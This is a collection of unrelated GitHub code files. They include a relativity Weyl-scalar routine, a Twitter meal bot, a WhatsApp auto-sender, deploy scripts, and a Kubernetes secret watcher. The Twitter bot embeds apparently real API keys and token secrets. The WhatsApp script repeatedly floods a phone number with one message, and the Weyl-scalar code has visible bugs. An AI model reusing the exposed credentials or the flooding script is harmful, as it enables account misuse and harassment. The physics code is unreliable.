needed.\ndef define_LeviCivitaSymbol(DIM=-1):\n if DIM == -1:\n DIM = par.parval_from_str(\"DIM\")\n\n LeviCivitaSymbol = ixp.zerorank3()\n\n for i in range(DIM):\n for j in range(DIM):\n for k in range(DIM):\n # From https://codegolf.stackexchange.com/questions/160359/levi-civita-symbol :\n LeviCivitaSymbol[i][j][k] = (i - j) * (j - k) * (k - i) / 2\n return LeviCivitaSymbol\n\n# Step 3: Compute the Weyl scalars\ndef WeylScalars():\n # Step 1:\n bssn.BSSN_RHSs()\n\n # Step 2b: Set spatial dimension (must be 3 for BSSN)\n DIM = 3\n par.set_parval_from_str(\"grid::DIM\",DIM)\n\n x = rfm.xxCart[0]\n y = rfm.xxCart[1]\n z = rfm.xxCart[2]\n\n if TetradChoice == \"Approx_QuasiKinnersley\":\n # Eqs 5.6 in https://arxiv.org/pdf/gr-qc/0104063.pdf\n xmoved = x - xorig # Make sure I'm handling coordinates correctly\n ymoved = y - yorig\n zmoved = z - zorig\n\n # Eqs 5.7\n vbU = ixp.zerorank1(\"vbU\")\n vaU = ixp.zerorank1(\"vaU\")\n vcU = ixp.zerorank1(\"vcU\")\n vaU[0] = -ymoved\n vaU[1] = xmoved + offset\n vaU[2] = 0\n vbU[0] = xmoved + offset\n vbU[1] = ymoved\n vbU[2] = zmoved\n LeviCivitaSymbol = define_LeviCivitaSymbol()\n for a in range(DIM):\n for b in range(DIM):\n for c in range(DIM):\n for d in range(DIM):\n vcU[a] += sp.sqrt(bssn.detgammabar) * bssn.gammabarUU[a][d] * LeviCivitaSymbol[d][b][c] * vaU[b] *vbU[c]\n\n # Graham-Schmidt orthonormalization of the tetrad\n waU = ixp.zerorank1(\"waU\")\n wbU = ixp.zerorank1(\"wbU\")\n wcU = ixp.zerorank1(\"wcU\")\n eaU = ixp.zerorank1(\"eaU\")\n ebU = ixp.zerorank1(\"ebU\")\n ecU = ixp.zerorank1(\"ecU\")\n\n waU[a] = vaU[a]\n omega11 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega11 += waU[a] * waU[b] * bssn.gammabarDD[a][b]\n eaU = waU / sp.sqrt(omega11)\n\n omega12 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega12 += eaU[a] * vaU[b] * bssn.gammabarDD[a][b]\n wbU = vbU - omega12*eaU\n omega22 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega22 += wbU[a] * wbU[b] *bssn.gammabarDD[a][b]\n ebU = wbU / sqrt(omega22)\n\n omega13 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega13 += eaU[a] * vcU[b] * bssn.gammabarDD[a][b]\n omega23 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega23 += ebU[a] * vcU[b] * bssn.gammabarDD[a][b]\n wcU = vcU - omega13*eaU - omega23*ebU\n\n # Construct the tetrad\n isqrt2 = 1/sp.sqrt(2)\n ltetU = isqrt2 * ebU\n ntetU = -isqrt2 * ebU\n mtetU = isqrt2 * (ecU + I*eaU)\n mtetbarU = sp.conjugate(mtetU)\n","repo_name":"leowerneck/NRPyIGM","sub_path":"BSSN/WeylScalars.py","file_name":"WeylScalars.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1858201637","text":"import requests\nimport time\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef fetch_url_data(pg_url):\n try:\n resp = requests.get(pg_url)\n except Exception as e:\n print(f\"Возникла ошибка при получении данных из url: {pg_url}\")\n else:\n return resp.content\n\n\ndef get_all_url_data(url_list):\n with ProcessPoolExecutor() as executor:\n resp = executor.map(fetch_url_data, url_list)\n return resp\n\n\nif __name__ == '__main__':\n url = \"https://www.uefa.com/uefaeuro-2020/\"\n for ntimes in [1, 10, 50, 100, 500]:\n start_time = time.time()\n responses = get_all_url_data([url] * ntimes)\n print(f'Получено {ntimes} результатов запроса за {time.time() - start_time} секунд')\n","repo_name":"pvladimir1989/asyncio","sub_path":"threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1158734301","text":"# 提出する時にはこの部分は含めない\nimport io,sys\nwith open(\"input.txt\") as txt_opend:\n TXT_INPUT = txt_opend.read()\nsys.stdin=io.StringIO(TXT_INPUT)\n# --------------------------------------------------------\n\ndef main():\n N = int(input()) # nは入力回数\n\nif __name__ == '__main__':\n main()","repo_name":"ntatsuyag/techful_training","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2686361096","text":"from django.contrib.auth.models import User\r\nfrom django.db import models\r\n\r\n\r\nclass Snippet(models.Model):\r\n name = models.CharField(max_length=200)\r\n code = models.TextField(max_length=5000)\r\n creation_date = models.DateTimeField()\r\n user = models.ForeignKey(to=User, on_delete=models.CASCADE,\r\n blank=True, null=True) # can be empty due to usage of AnonymousUser\r\n","repo_name":"StepWolf45/Snippets","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32224263988","text":"\nimport keyboard as a\nimport time\nimport webbrowser as browser\nnumber = str(input(\"Enter the mobile number with country code: +\"))\nmessage = str(input(\"\\nEnter the message you want to send continuously: \"))\ncount = 0\nn=0\nwhile count <= 0:\n try:\n count = int(input(\"\\nHow many times you want to send? \"))\n except ValueError:\n print(\"\\nOops!\\nIt seems you have entered a text, please enter a number\")\nprint(\"\\nWhatsapp web will open in 5 seconds\")\ntime.sleep(5)\nlink = \"https://web.whatsapp.com/send?phone=\"+number\nbrowser.open(link)\nprint(\"Message(s) will start sending in 25 seconds with 0.5 second delay between each message\")\n\ntime.sleep(25)\nwhile n 3:\n out_dir = sys.argv[3]\n else:\n out_dir = \".\"\n v = gen_mace4_files(out_dir, n1, n2)\n \n","repo_name":"ChoiwahChow/varieties","sub_path":"src/groups/gen_formulas.py","file_name":"gen_formulas.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21577233105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nfabfile to deploy {{cookiecutter.project_name}} to server\n\n- Requirements:\n fabric==2.0.1\n asn1crypto==0.24.0\n bcrypt==3.1.4\n cffi==1.11.5\n cryptography==2.2.2\n invoke==1.0.0\n paramiko==2.4.1\n pyasn1==0.4.3\n pycparser==2.18\n pynacl==1.2.1\n\n slackclient==1.2.1\n websocket-client==0.47.0\n\n- Usage:\n fab -H my-server deploy\n\n\"\"\"\n\nimport traceback\nimport logging\nfrom slackclient import SlackClient\nfrom fabric import Connection\nfrom invoke import task\n\n# Configuration\n# -----------------------------------------\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nWORK_DIR = '/deploy'\n\n# file storage last git commit id\nLAST_CID_FILE = \"last_commit_id.txt\"\n\n# Config slack for notification\nSLACK_API_KEY = \"xxx-xxx-xxx\"\nCHANNEL_NAME = \"#random\"\n\n\n# Utils functions\n# -----------------------------------------\nclass Slacker:\n COLOR_GOOD = 'good'\n\n sc = SlackClient(SLACK_API_KEY)\n\n def send(self, **kargs):\n try:\n self.sc.api_call(\n \"chat.postMessage\",\n channel=CHANNEL_NAME,\n username='Deployment',\n # as_user=True,\n icon_emoji=\":gear:\",\n **kargs\n )\n except Exception:\n traceback.print_exc()\n\n def send_attachment(self, message_text, title, text, color='good'):\n attachments = [\n {\n \"color\": color,\n \"title\": title,\n \"text\": text,\n },\n ]\n self.send(attachments=attachments, text=message_text)\n\n\nsc = Slacker()\n\n\ndef run(c, command, capture=False):\n result = c.run(command, echo=True)\n if capture:\n return result.stdout.strip()\n return result\n\n\ndef get_current_commit(c):\n return run(c, \"git rev-parse HEAD\", True)\n\n\ndef save_last_commit(c):\n run(c, \"git rev-parse HEAD > {}\".format(LAST_CID_FILE))\n\n\ndef get_last_commit(c):\n return run(c, \"cat {}\".format(LAST_CID_FILE), True)\n\n\ndef get_git_logs(c, last_commit_id, current_commit_id):\n return run(c, \"git log {}...{} --oneline --pretty=format:'%s'\".format(last_commit_id, current_commit_id), True)\n\n\ndef notify_commit_applied(c):\n last_commit_id = get_last_commit(c)\n current_commit_id = get_current_commit(c)\n commit_applied = get_git_logs(c, last_commit_id, current_commit_id)\n if commit_applied:\n commit_applied = \"••• \" + commit_applied\n commit_applied = commit_applied.replace(\"\\n\", \"\\n••• \")\n else:\n commit_applied = 'No commit applied!'\n\n sc.send_attachment(\"Deploy to *{}* success\".format(c.host), \"Commit applied:\", commit_applied)\n\n\ndef notify_start_deploy(c):\n user = c.local('whoami').stdout\n sc.send(text=\"Sender ({}) - Started by user {}\".format(c.host, user))\n\n\n@task\ndef deploy(c):\n notify_start_deploy(c)\n logger.info(\"Deploying on {}\".format(c.host))\n with c.cd(WORK_DIR):\n if c.run('test -f {}'.format(LAST_CID_FILE), warn=True).failed:\n logger.info(\"Create {} file\".format(LAST_CID_FILE))\n save_last_commit(c)\n run(c, 'git pull origin master')\n docker_restart(c)\n notify_commit_applied(c)\n save_last_commit(c)\n\n\ndef docker_restart(c):\n run(c, 'docker-compose restart {{cookiecutter.project_slug}}')\n","repo_name":"cuongtransc/cookiecutter-simple-django","sub_path":"{{cookiecutter.project_slug}}/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11784551853","text":"with open('07.txt') as file:\n nums = [int(x) for line in file.readlines() for x in line.split(',')]\n nums.sort()\n\nmedian = nums[len(nums)//2]\nfuel_part_1 = sum((abs(median - num) for num in nums))\nprint(f'DAY 7 | PART 1: {fuel_part_1}')\n\navg = sum(nums)/len(nums)\nlower, upper = int(avg), int(avg) + 1\nfuel1 = sum(sum(range(1, abs(lower - num) + 1)) for num in nums)\nfuel2 = sum(sum(range(1, abs(upper - num) + 1)) for num in nums)\n\n# fuel = sum(sum(range(1, abs(avg - num) + 1)) for num in nums)\n# fuel = sum(map(lambda x: (abs(avg - x) * (abs(avg - x) + 1)) / 2, nums))\nprint(f'DAY 7 | PART 2: {fuel1 if fuel1 < fuel2 else fuel2}')","repo_name":"thunguy/AdventOfCode","sub_path":"2021/DAY7.py","file_name":"DAY7.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4571357077","text":"from typing import Optional\n\nfrom wand.image import Image\n\n\nGRAVITY_MATCH = {\n 'nw': 'north_west',\n 'n': 'north',\n 'ne': 'north_east',\n 'w': 'west',\n 'c': 'center',\n 'e': 'east',\n 'sw': 'south_west',\n 's': 'south',\n 'se': 'south_east',\n}\n\n\ndef handle_crop(image: Image, params: str):\n gravity = params[:2]\n if gravity not in GRAVITY_MATCH:\n gravity = params[:1]\n if gravity not in GRAVITY_MATCH:\n gravity = 'c'\n else:\n params = params[1:]\n else:\n params = params[2:]\n\n width, height = [int(p) for p in params.split('x')]\n image.crop(width=width, height=height, gravity=GRAVITY_MATCH[gravity])\n\n\ndef process_image(source_image: Image, operations_string: str) -> Optional[Image]:\n operations = operations_string.split('/')\n image = source_image.clone()\n\n while len(operations) > 1:\n operation = operations.pop(0)\n params = operations.pop(0)\n\n if operation == 'crop':\n handle_crop(image, params)\n\n if operation == 'resize':\n image.transform(resize=params)\n\n if operation == 'rotate':\n image.rotate(int(params))\n\n return image\n","repo_name":"hypnocapybara/images-server","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"14307790638","text":"class Node:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n self.north = None\r\n self.south = None\r\n self.east = None\r\n self.west = None\r\n \r\n def __str__(self):\r\n return f\"Node({self.x}, {self.y})\"\r\n \r\n def link(self, other):\r\n if other.x == self.x - 1 and other.y == self.y:\r\n self.north = other\r\n other.south = self\r\n elif other.x == self.x + 1 and other.y == self.y:\r\n self.south = other\r\n other.north = self\r\n elif other.x == self.x and other.y == self.y - 1:\r\n self.west = other\r\n other.east = self\r\n elif other.x == self.x and other.y == self.y + 1:\r\n self.east = other\r\n other.west = self\r\n\r\n\r\nclass UndirectedGraph:\r\n def __init__(self, row, col):\r\n self.row = row\r\n self.col = col\r\n self.matrix = [[Node(x, y) for y in range(col)] for x in range(row)]\r\n for x in range(row):\r\n for y in range(col):\r\n if x > 0:\r\n self.matrix[x][y].link(self.matrix[x-1][y])\r\n if x < row - 1:\r\n self.matrix[x][y].link(self.matrix[x+1][y])\r\n if y > 0:\r\n self.matrix[x][y].link(self.matrix[x][y-1])\r\n if y < col - 1:\r\n self.matrix[x][y].link(self.matrix[x][y+1])\r\n \r\n def __str__(self):\r\n res = []\r\n for x in range(self.row):\r\n for y in range(self.col):\r\n obj = self.matrix[x][y]\r\n res.append(f\"Node({obj.x}, {obj.y}): north={obj.north}, south={obj.south}, east={obj.east}, west={obj.west}\")\r\n return \"\\n\".join(res)\r\n\r\nif __name__ == \"__main__\":\r\n matrix = UndirectedGraph(3, 4)\r\n print(matrix)\r\n","repo_name":"akiki19950827/gen_hdl_top","sub_path":"undirected_graph_lib/UndirectedGraph.py","file_name":"UndirectedGraph.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74661682658","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.bucket, name='bucket'),\n path('get-bucket-files/', views.get_bucket_files, name='get-bucket-files'),\n path('download-bucket-file', views.download_bucket_file, \n name='download-bucket-file'),\n path('copy-file', views.copy_files, name='copy-file'),\n\n path('download', views.download_files, name=\"download\"),\n\n\n # \n path('export-data', views.export_data, name='export-data'),\n]\n","repo_name":"gorakshsanas92/aws-s3-bucket-file-download-transfer","sub_path":"bucket/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4280126916","text":"from src.benchling.utils.auth_utils import APIConnector\nfrom src.utils.base_classes import BaseClass\n\nclass BenchlingConnection(BaseClass):\n def __init__(self, client_id, benchling_tenant, secret_key, token_url):\n self.tenant = benchling_tenant\n self.secret_key = secret_key\n self.client_id = client_id\n self.token_url = token_url\n self.get_store_token()\n\n def get_store_token(self):\n self._auth_object = APIConnector(self.token_url, self.client_id, self.secret_key)\n if self._auth_object:\n print('BenchlingConnection initialized')\n else:\n raise (Exception(\"APIConnector failed to make _auth_object.\"))\n self.token = self._auth_object.token\n ","repo_name":"htgt/SGE-RESTful-Layer","sub_path":"src/benchling/utils/connection_class.py","file_name":"connection_class.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36999422745","text":"def main():\n N = int(input())\n card = list(range(1, N + 1))\n\n while True:\n print(card.pop(0), end=' ')\n if not card:\n break\n card.append(card.pop(0))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TopGun1405/BaekJoonOJ-Python","sub_path":"BOJ_N-2000-2499/BOJ_N-2161.py","file_name":"BOJ_N-2161.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25288529261","text":"import tweepy\r\n# 트위터 api\r\nfrom neispy import Neispy\r\n# 교육청 api\r\nfrom datetime import datetime\r\n# 현재 시간 가져오기 위함\r\nimport sys\r\n\r\n# twitter developer에서 아래의 값들을 구할 수 잇음.\r\n# https://developer.twitter.com/en\r\n# 트위터 Consumer Keys\r\napikey = 'WwxGR0uarHBtkMQyhHnU2v9Rv'\r\napisecret = 'hKWh82mXxeauj5W4nyVsKOiV1xR9YG1JjTAKA0pPGiFsDA7OQS'\r\n# 트위터 Authentication Tokens\r\naccess_token = '1390944695530885126-ZZtkZXRBnNAu7QpOG7aESPKnDcrmt1'\r\naccess_token_secret = 'RvAXnxswqGa1uhjIvqlYbL3KTlnxR870Dse8RQms3YuxR'\r\n\r\n# tweepy 설정\r\n# 이부분은 그냥 tweepy에서 하라는데로 한 것..\r\nauth = tweepy.OAuthHandler(apikey, apisecret)\r\nauth.set_access_token(access_token,access_token_secret)\r\napi = tweepy.API(auth)\r\n\r\n#학교 이름, 변경하지 말것\r\nname = \"한국애니메이션고등학교\"\r\n\r\n# 트위터에 트윗하는 함수\r\n# message : 트윗할 내용 \r\ndef Twit(message):\r\n print(message)\r\n try:\r\n api.update_status(message)\r\n # tweepy로 트윗\r\n except Exception as e: \r\n print(e)\r\n # Exception 발생 시 터미널에 출력\r\n\r\n# 급식 정보를 가져오는 함수\r\n# pMealtime : 급식의 index를 받아옴 \r\n# 그러나 위탁급식으로 인해 점심밖에 제공되지 않음, 0으로 고정\r\ndef GetMeal(pMealtime):\r\n\r\n # neispy 설정 \r\n neis = Neispy.sync()\r\n\r\n scinfo = neis.schoolInfo(SCHUL_NM=name)\r\n AE = scinfo[0].ATPT_OFCDC_SC_CODE \r\n SE = scinfo[0].SD_SCHUL_CODE \r\n\r\n Year = datetime.today().strftime(\"%Y\")\r\n Month = datetime.today().strftime(\"%m\")\r\n Date = datetime.today().strftime(\"%d\")\r\n\r\n # 최종적으로 출력될 값\r\n # 원래는 아침 점심 저녁을 전부 출력해줬으나\r\n # 위탁급식으로 변경 후 neispy에서 아침 / 저녁을 가져올 수 없어서\r\n # 점심으로 고정해놨음.\r\n outputString = ('{}년 {}월 {}일\\n한국애니메이션고등학교 점심입니다.\\n'.format(Year,Month,Date))\r\n\r\n try:\r\n mealData = neis.mealServiceDietInfo(AE, SE, MLSV_YMD=int(datetime.today().strftime(\"%Y%m%d\")))\r\n mealString = mealData[pMealtime].DDISH_NM.replace(\"
    \", \"\\n\")\r\n outputString += mealString\r\n except Exception as e:\r\n # neispy에서 가끔 api 문제가 생김\r\n # 이 경우 출력값을 비우고 에러를 터미널에 출력\r\n print(e)\r\n outputString = \"\"\r\n\r\n return outputString\r\n\r\ndef main():\r\n # 인자로 run이 들어온 경우에만 출력\r\n # heroku에서는 앱이 업로드되면 일단 실행됨\r\n # 그러므로 scehduler에 의해서만 실행 가능하도록 인자를 설정\r\n # C++의 char* argv[], C#의 string args[] 같은거라고 생각하면 편함. \r\n arg = sys.argv[sys.argv.__len__()-1] \r\n if arg == 'run':\r\n Twit(GetMeal(0))\r\n elif arg == 'test':\r\n Twit('Testing')\r\n\r\n# main함수 실행\r\nmain()","repo_name":"s53809/KAHMealBot","sub_path":"MealBot/KAHMealBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7765040835","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport geoposition.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('romani', '0058_auto_20170128_1249'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='geo_punt',\n field=geoposition.fields.GeopositionField(max_length=42, default=1),\n preserve_default=False,\n ),\n ]\n","repo_name":"wkov/labiadas","sub_path":"romani/migrations/0059_userprofile_geo_punt.py","file_name":"0059_userprofile_geo_punt.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32408254614","text":"# import libraries\nimport sys\n\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\n\n# download necessary NLTK data\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\nnltk.download(['punkt', 'wordnet'])\n\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import classification_report ,precision_score,accuracy_score,recall_score\n\nimport pickle\n\n\ndef load_data(database_filepath):\n \"\"\"\n Loads the SqliteDB table based on given filepath\n Input:\n database_filepath - Path of the DB file\n Output:\n X - Dataframe of input features\n Y - Target variables\n List of target variable names\n \"\"\"\n# engine = create_engine('sqlite:///InsertDatabaseName.db')\n engine = create_engine('sqlite:///'+database_filepath)\n df = pd.read_sql_table('cleanedmessage',engine)\n \n print( \"Target label that dont have variance\" + str( list(df.columns[df.sum()==0]) ) )\n X = df.message\n #Drop child_alone feature as they only have one class\n Y = df[['related', 'request', 'offer', 'aid_related', 'medical_help', 'medical_products', 'search_and_rescue', 'security', 'military', 'water', 'food', 'shelter', 'clothing', 'money', 'missing_people', 'refugees', 'death', 'other_aid', 'infrastructure_related', 'transport', 'buildings', 'electricity', 'tools', 'hospitals', 'shops', 'aid_centers', 'other_infrastructure', 'weather_related', 'floods', 'storm', 'fire', 'earthquake', 'cold', 'other_weather', 'direct_report']]\n \n #feature related which is an indicator field is having value as 2 .As that is not possible replacing 2 with 0\n Y.loc[Y.related==2,'related']=0\n Y.iloc[:,:] = Y.iloc[:,:].astype(bool)\n \n return X,Y ,list(Y.columns)\n\n\ndef tokenize(text):\n '''\n Input:\n Raw text message\n Output:\n Tokenized text\n '''\n clean_tkn = []\n tken = word_tokenize(text)\n lmtzr = WordNetLemmatizer()\n \n for tok in tken:\n clean_tk = lmtzr.lemmatize(tok).lower().strip()\n clean_tkn.append(clean_tk)\n\n return clean_tkn\n\n\ndef build_model():\n \"\"\"\n Builts and return cross validation pipeline with data transformation and classification steps\n \"\"\"\n vect = CountVectorizer(tokenizer=tokenize)\n tfid_trn = TfidfTransformer()\n clf = MultiOutputClassifier(LogisticRegression())\n \n pipeline = Pipeline([\n ('vect_stp', CountVectorizer(tokenizer=tokenize)),\n ('tfid_trn_stp', TfidfTransformer()),\n ('clf_stp', MultiOutputClassifier(LogisticRegression()) )] )\n \n parameters = {'clf_stp__n_jobs': [1, 2, 4] }\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv\n \ndef f_score(func,y_test,y_hat):\n \"\"\"\n Input:\n func - metric function \n y_test - Actual target variable\n y_hat - predicted target values\n Output:\n returns metric for all the target variable as dataframe\n \"\"\"\n score_df=pd.DataFrame( np.zeros(y_test.shape[1]) )\n for x in np.arange(y_test.shape[1]):\n score_df.loc[x,0]=func(y_test.iloc[:,x],y_hat.iloc[:,x])\n return score_df\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Displays the Accuracy , recall and precision metrics for each of the target variable\n Input:\n model - trained model for evaluation\n X_test - Dataframe of input features\n Y_test - Actual target values\n category_names - List of target variable names\n \"\"\"\n Y_test_pred=pd.DataFrame(model.predict(X_test) ,columns=category_names )\n \n recall_met=f_score(recall_score,Y_test,Y_test_pred)\n prec_met=f_score(precision_score,Y_test,Y_test_pred)\n acc_met=f_score(accuracy_score,Y_test,Y_test_pred)\n\n result = pd.concat([acc_met,recall_met, prec_met], axis=1, join='inner')\n\n result.columns=['accuracy','recall','precision']\n result.set_axis( category_names , inplace=True )\n print('Metrics of each of the target variable')\n print('-------------------------------------------------------------------------------------------')\n print(result)\n print('-------------------------------------------------------------------------------------------')\n\n\ndef save_model(model, model_filepath):\n \"\"\"Save model in path using pickle\"\"\"\n pickle.dump( model, open(model_filepath, 'wb') )\n \n\n\ndef main():\n \"\"\"\n Main execution block\n \"\"\"\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n #select the best estimator from the cross validation\n bst_model=model.best_estimator_\n \n print('Evaluating model...')\n evaluate_model(bst_model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(bst_model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"kingkovai/Disaster_response","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4614165731","text":"import base64\nimport os\nfrom multiprocessing import Process\nfrom time import sleep\n\nfrom kubernetes import client, watch\nfrom kubernetes.client.rest import ApiException\nfrom urllib3.exceptions import ProtocolError\n\nfrom helpers import request, writeTextToFile, removeFile\n\n_list_namespaced = {\n \"secret\": \"list_namespaced_secret\",\n \"configmap\": \"list_namespaced_config_map\"\n}\n\n_list_for_all_namespaces = {\n \"secret\": \"list_secret_for_all_namespaces\",\n \"configmap\": \"list_config_map_for_all_namespaces\"\n}\n\n\ndef _get_file_data_and_name(full_filename, content, resource):\n if resource == \"secret\":\n file_data = base64.b64decode(content).decode()\n else:\n file_data = content\n\n if full_filename.endswith(\".url\"):\n filename = full_filename[:-4]\n file_data = request(file_data, \"GET\").text\n else:\n filename = full_filename\n\n return filename, file_data\n\n\ndef listResources(label, targetFolder, url, method, payload, current, folderAnnotation, resource):\n v1 = client.CoreV1Api()\n namespace = os.getenv(\"NAMESPACE\", current)\n if namespace == \"ALL\":\n ret = getattr(v1, _list_for_all_namespaces[resource])()\n else:\n ret = getattr(v1, _list_namespaced[resource])(namespace=namespace)\n\n for sec in ret.items:\n destFolder = targetFolder\n metadata = sec.metadata\n if metadata.labels is None:\n continue\n print(f'Working on {resource}: {metadata.namespace}/{metadata.name}')\n if label in sec.metadata.labels.keys():\n print(f\"Found {resource} with label\")\n if sec.metadata.annotations is not None:\n if folderAnnotation in sec.metadata.annotations.keys():\n destFolder = sec.metadata.annotations[folderAnnotation]\n\n dataMap = sec.data\n if dataMap is None:\n print(f\"No data field in {resource}\")\n continue\n\n if label in sec.metadata.labels.keys():\n for data_key in dataMap.keys():\n filename, filedata = _get_file_data_and_name(data_key, dataMap[data_key],\n resource)\n writeTextToFile(destFolder, filename, filedata)\n\n if url is not None:\n request(url, method, payload)\n\n\ndef _watch_resource_iterator(label, targetFolder, url, method, payload,\n current, folderAnnotation, resource):\n v1 = client.CoreV1Api()\n namespace = os.getenv(\"NAMESPACE\", current)\n if namespace == \"ALL\":\n stream = watch.Watch().stream(getattr(v1, _list_for_all_namespaces[resource]))\n else:\n stream = watch.Watch().stream(getattr(v1, _list_namespaced[resource]), namespace=namespace)\n\n for event in stream:\n destFolder = targetFolder\n metadata = event['object'].metadata\n if metadata.labels is None:\n continue\n print(f'Working on {resource} {metadata.namespace}/{metadata.name}')\n if label in event['object'].metadata.labels.keys():\n print(f\"{resource} with label found\")\n if event['object'].metadata.annotations is not None:\n if folderAnnotation in event['object'].metadata.annotations.keys():\n destFolder = event['object'].metadata.annotations[folderAnnotation]\n print('Found a folder override annotation, '\n f'placing the {resource} in: {destFolder}')\n dataMap = event['object'].data\n if dataMap is None:\n print(f\"{resource} does not have data.\")\n continue\n eventType = event['type']\n for data_key in dataMap.keys():\n print(f\"File in {resource} {data_key} {eventType}\")\n\n if (eventType == \"ADDED\") or (eventType == \"MODIFIED\"):\n filename, filedata = _get_file_data_and_name(data_key, dataMap[data_key],\n resource)\n writeTextToFile(destFolder, filename, filedata)\n\n if url is not None:\n request(url, method, payload)\n else:\n filename = data_key[:-4] if data_key.endswith(\".url\") else data_key\n removeFile(destFolder, filename)\n if url is not None:\n request(url, method, payload)\n\n\ndef _watch_resource_loop(*args):\n while True:\n try:\n _watch_resource_iterator(*args)\n except ApiException as e:\n if e.status != 500:\n print(f\"ApiException when calling kubernetes: {e}\\n\")\n else:\n raise\n except ProtocolError as e:\n print(f\"ProtocolError when calling kubernetes: {e}\\n\")\n except Exception as e:\n print(f\"Received unknown exception: {e}\\n\")\n\n\ndef watchForChanges(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources):\n\n firstProc = Process(target=_watch_resource_loop,\n args=(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources[0])\n )\n firstProc.start()\n\n if len(resources) == 2:\n secProc = Process(target=_watch_resource_loop,\n args=(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources[1])\n )\n secProc.start()\n\n while True:\n if not firstProc.is_alive():\n print(f\"Process for {resources[0]} died. Stopping and exiting\")\n if len(resources) == 2 and secProc.is_alive():\n secProc.terminate()\n elif len(resources) == 2:\n print(f\"Process for {resources[1]} also died...\")\n raise Exception(\"Loop died\")\n\n if len(resources) == 2 and not secProc.is_alive():\n print(f\"Process for {resources[1]} died. Stopping and exiting\")\n if firstProc.is_alive():\n firstProc.terminate()\n else:\n print(f\"Process for {resources[0]} also died...\")\n raise Exception(\"Loop died\")\n\n 